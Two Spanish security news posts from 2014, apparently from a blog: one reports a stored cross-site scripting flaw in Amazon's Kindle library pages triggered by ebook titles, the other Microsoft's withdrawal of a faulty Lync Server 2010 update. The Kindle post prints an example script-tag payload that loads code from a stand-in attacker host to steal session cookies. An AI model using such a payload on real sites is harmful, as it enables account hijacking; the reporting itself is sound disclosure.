martes, 16 de septiembre de 2014

Vulnerabilidad en Kindle permite obtener detalles de la cuenta de usuario

Se ha anunciado una vulnerabilidad en el software del Kindle de Amazon que podría permitir a un atacante acceder a todos los detalles de una cuenta de Amazon.

El problema reside en un cross-site scripting almacenado, la más peligrosa de todas las formas de este tipo de ataques, en la librería Kindle de Amazon, en las páginas conocidas como "Manage Your Content and Devices" y "Manage your Kindle". El fallo se produce al descargar un libro electrónico desde un sitio que no sea la propia web de Amazon, y podría permitir inyectar código malicioso a través de los metadatos del libro (por ejemplo el título).

El atacante podrá crear un libro con un título como
<script src="https://www.atacante.org/script.js"></script>
Una vez que la víctima descargue el libro y lo tenga añadido a su librería, el código se ejecutara en el momento en que la víctima abra la página web de la librería del Kindle. Como resultado, el atacante podrá acceder y transferir las cookies de sesión de Amazón, por lo que la cuenta quedará comprometida. Existe disponible una prueba de concepto del problema.

Lo más sorprendente es que según Benjamin Daniel Mussler, investigador que ha dado a conocer el problema, reportó el problema a Amazon en noviembre de 2013 y fue corregido poco después. Sin embargo confirma que, hace dos meses, al publicar una nueva versión de la aplicación web "Manage your Kindle" se ha reintroducido la vulnerabilidad. Según confirma no ha obtenido respuesta a ninguna de sus comunicaciones.

Más información:

Amazon.com Stored XSS via Book Metadata



Antonio Ropero
Twitter: @aropero


lunes, 15 de septiembre de 2014

Nuevo problema en las actualizaciones de Microsoft

Por segundo mes consecutivo Microsoft se ha visto obligado a retirar del centro de descargas una de las actualizaciones publicadas dentro del conjunto de boletines de seguridad publicado el pasado martes. En esta ocasión los problemas se han dado con el boletín MS14-055 en servidores Microsoft Lync Server 2010.

Microsoft ha retirado la actualización 2982385 para Microsoft Lync Server 2010 perteneciente al boletín MS14-045 del "Download Center". Este boletín estaba calificado como "importante" y solucionaba tres vulnerabilidades que podrían permitir a un atacante provocar denegaciones de servicio en servidores Lync 2010 y 2013. En esta ocasión parece que los problemas solo se dan en servidores Lync 2010.

Microsoft ha indicado que ha retirado la actualización debido a que algunos usuarios no han podido llegar a instalar correctamente la actualización 2982385 para Microsoft Lync Server 2010. Según han reportado algunos usuarios de Lync 2010 han sufrido problemas en el servidor Edge al haber instalado la actualización KB2953590 para OCSCore pero no poder instalar correctamente la actualización 2982385 para Lync Server.

Dentro de unos días, tal y como ocurrió el pasado mes con la actualización MS14-045 Microsoft volverá a publicar la actualización con todos los problemas ya solucionados. Aunque estos dos problemas se han dado en productos y configuraciones muy determinados y poco habituales, no deja de ser preocupante que el mismo suceso haya ocurrido por dos meses consecutivos. Microsoft establece grandes controles antes de publicar un parche, resulta complejo evaluar una actualización en todas las posibles configuraciones, idiomas, versiones, etc. Pero esperamos, por la tranquilidad de todos, que este tipo de problemas no se vuelvan a repetir.

Más información:

una-al-dia (17/08/2014) Microsoft recomienda desinstalar la actualización MS14-045

MS14-055 Broke My Edge Server

Microsoft Security Bulletin MS14-055 - Important
Vulnerabilities in Microsoft Lync Server Could Allow Denial of Service (2990928)

una-al-dia (09/09/2014) Boletines de seguridad de Microsoft de septiembre

una-al-dia (27/08/2014) Microsoft vuelve a publicar la actualización MS14-045


Antonio Ropero

Twitter: @aropero